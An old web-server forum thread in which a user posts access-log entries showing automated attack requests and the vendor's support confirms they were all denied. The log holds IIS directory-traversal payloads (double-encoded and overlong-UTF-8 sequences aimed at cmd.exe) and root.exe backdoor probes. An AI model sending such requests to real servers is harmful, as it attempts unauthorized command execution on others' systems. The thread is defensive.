Security

 
Post new topic   Reply to topic    Aprelium Forum Index -> General Questions
View previous topic :: View next topic  
Author Message
skiward
Guest





PostPosted: Wed Oct 02, 2002 2:59 pm    Post subject: Security Reply with quote

I just set the server up last night. I have yet to share the addy with anyone. I was checking the log this morning out of curiosity, and noticed what appears to be one, or several attempts to take over my system. (multiple IP's) I have included a copy of the appropriate log code below. I know that all the GET attempts returned 400 or 404 calls, so they should have all been denied, but is the server secure to attempted attacks like this? Thanks

24.157.19.214 - - [02/Oct/2002:00:24:36 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 438
24.76.144.218 - - [02/Oct/2002:01:42:48 +1133] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 400 440
24.192.4.123 - - [02/Oct/2002:02:00:30 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 438
24.192.4.123 - - [02/Oct/2002:02:00:32 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 438
24.192.4.123 - - [02/Oct/2002:02:00:33 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 438
24.192.4.123 - - [02/Oct/2002:02:00:33 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 438
24.192.4.123 - - [02/Oct/2002:02:00:35 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.192.4.123 - - [02/Oct/2002:02:00:36 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.192.4.123 - - [02/Oct/2002:02:00:37 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.192.4.123 - - [02/Oct/2002:02:00:38 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.192.4.123 - - [02/Oct/2002:02:00:39 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.192.4.123 - - [02/Oct/2002:02:00:41 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.192.4.123 - - [02/Oct/2002:02:00:41 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.192.4.123 - - [02/Oct/2002:02:00:42 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.192.4.123 - - [02/Oct/2002:02:00:48 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.192.4.123 - - [02/Oct/2002:02:00:49 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.86.214.239 - - [02/Oct/2002:09:14:51 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 438
24.86.214.239 - - [02/Oct/2002:09:14:52 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 438
24.86.214.239 - - [02/Oct/2002:09:14:53 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 438
24.86.214.239 - - [02/Oct/2002:09:14:53 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 438
24.86.214.239 - - [02/Oct/2002:09:14:54 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.86.214.239 - - [02/Oct/2002:09:14:55 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.86.214.239 - - [02/Oct/2002:09:14:55 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.86.214.239 - - [02/Oct/2002:09:14:55 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.86.214.239 - - [02/Oct/2002:09:14:56 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.86.214.239 - - [02/Oct/2002:09:14:57 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.86.214.239 - - [02/Oct/2002:09:14:57 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.86.214.239 - - [02/Oct/2002:09:14:57 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.86.214.239 - - [02/Oct/2002:09:14:59 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.86.214.239 - - [02/Oct/2002:09:15:00 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.120.220.66 - - [02/Oct/2002:09:37:34 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 438
24.120.220.66 - - [02/Oct/2002:09:37:35 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 438
24.120.220.66 - - [02/Oct/2002:09:37:35 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 438
24.120.220.66 - - [02/Oct/2002:09:37:36 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 438
24.120.220.66 - - [02/Oct/2002:09:37:36 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.120.220.66 - - [02/Oct/2002:09:37:36 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.120.220.66 - - [02/Oct/2002:09:37:37 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.120.220.66 - - [02/Oct/2002:09:37:38 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.120.220.66 - - [02/Oct/2002:09:37:39 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.120.220.66 - - [02/Oct/2002:09:37:39 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.120.220.66 - - [02/Oct/2002:09:37:40 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.120.220.66 - - [02/Oct/2002:09:37:40 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.120.220.66 - - [02/Oct/2002:09:37:42 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
24.120.220.66 - - [02/Oct/2002:09:37:43 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 440
Back to top
aprelium
-


Joined: 22 Mar 2002
Posts: 6800

PostPosted: Wed Oct 02, 2002 3:14 pm    Post subject: Re: Security Reply with quote

skiward wrote:
I just set the server up last night. I have yet to share the addy with anyone. I was checking the log this morning out of curiosity, and noticed what appears to be one, or several attempts to take over my system. (multiple IP's) I have included a copy of the appropriate log code below. I know that all the GET attempts returned 400 or 404 calls, so they should have all been denied, but is the server secure to attempted attacks like this? Thanks

These attacks affect Microsoft IIS web servers.
Even small and even Aprelium is not as huge as Microsoft, Abyss Web Server was designed to be robust and secure. The best proof is that it denied all the malicious requests you received :D
(and 6 months after the first release and with over 30000 users worldwide, no crash was reported and only two minor URL decoding bugs were detected and they were fixed in the next hours after their discovery.)
_________________
Support Team
Aprelium - http://www.aprelium.com
Back to top View user's profile Send private message Send e-mail
Display posts from previous:   
Post new topic   Reply to topic    Aprelium Forum Index -> General Questions All times are GMT + 1 Hour
Page 1 of 1

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum


Powered by phpBB phpBB Group